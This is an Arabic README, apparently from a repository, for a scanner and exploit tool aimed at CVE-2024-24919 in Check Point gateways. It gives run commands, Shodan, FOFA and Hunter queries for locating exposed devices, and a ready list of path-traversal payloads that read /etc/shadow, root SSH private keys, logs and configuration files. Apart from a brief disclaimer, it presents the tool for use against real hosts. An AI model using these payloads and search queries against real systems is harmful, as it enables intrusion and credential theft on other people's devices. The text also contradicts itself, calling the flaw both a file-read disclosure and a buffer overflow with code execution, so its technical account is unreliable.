
استغلال CVE-2024-24919
يحتوي هذا المستودع على أداة لاستغلال ثغرة CVE-2024-24919 في بوابات Check Point الأمنية. الأداة عبارة عن ماسح متعدد يمكنه تحديد الأجهزة المعرضة للخطر، كما تعمل كأداة استغلال ضد هدف واحد للسيطرة الكاملة على الجهاز المصاب.
CVE-2024-24919 هي ثغرة كشف معلومات شديدة الخطورة تسمح للمهاجم بقراءة ملفات عشوائية عن بُعد على بوابة Check Point الأمنية. يمكن استغلال هذه الثغرة لسرقة معلومات حساسة مثل كلمات المرور وملفات الإعدادات.
إخلاء مسؤولية:
هذه الأداة مقدمة لأغراض تعليمية فقط. لا ينبغي استخدامها لمهاجمة الأنظمة المعرضة للخطر دون موافقة صريحة من مالكها. مؤلفو هذه الأداة غير مسؤولين عن أي أضرار قد تنجم عن استخدامها.
يعمل الاستغلال عن طريق إرسال طلب HTTP مصمم خصيصًا إلى الجهاز المعرض للخطر. يؤدي الطلب إلى حدوث تجاوز في سعة المخزن المؤقت (buffer overflow) في البرنامج الثابت للجهاز، مما يسمح للمهاجم بتنفيذ تعليمات برمجية عشوائية. يمكن بعد ذلك استخدام الاستغلال للسيطرة الكاملة على الجهاز.
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
يمكنك فحص هدف واحد أو عدة أهداف!
python cve-2024-24919.py
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"

$ مسارات الأداة : ```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```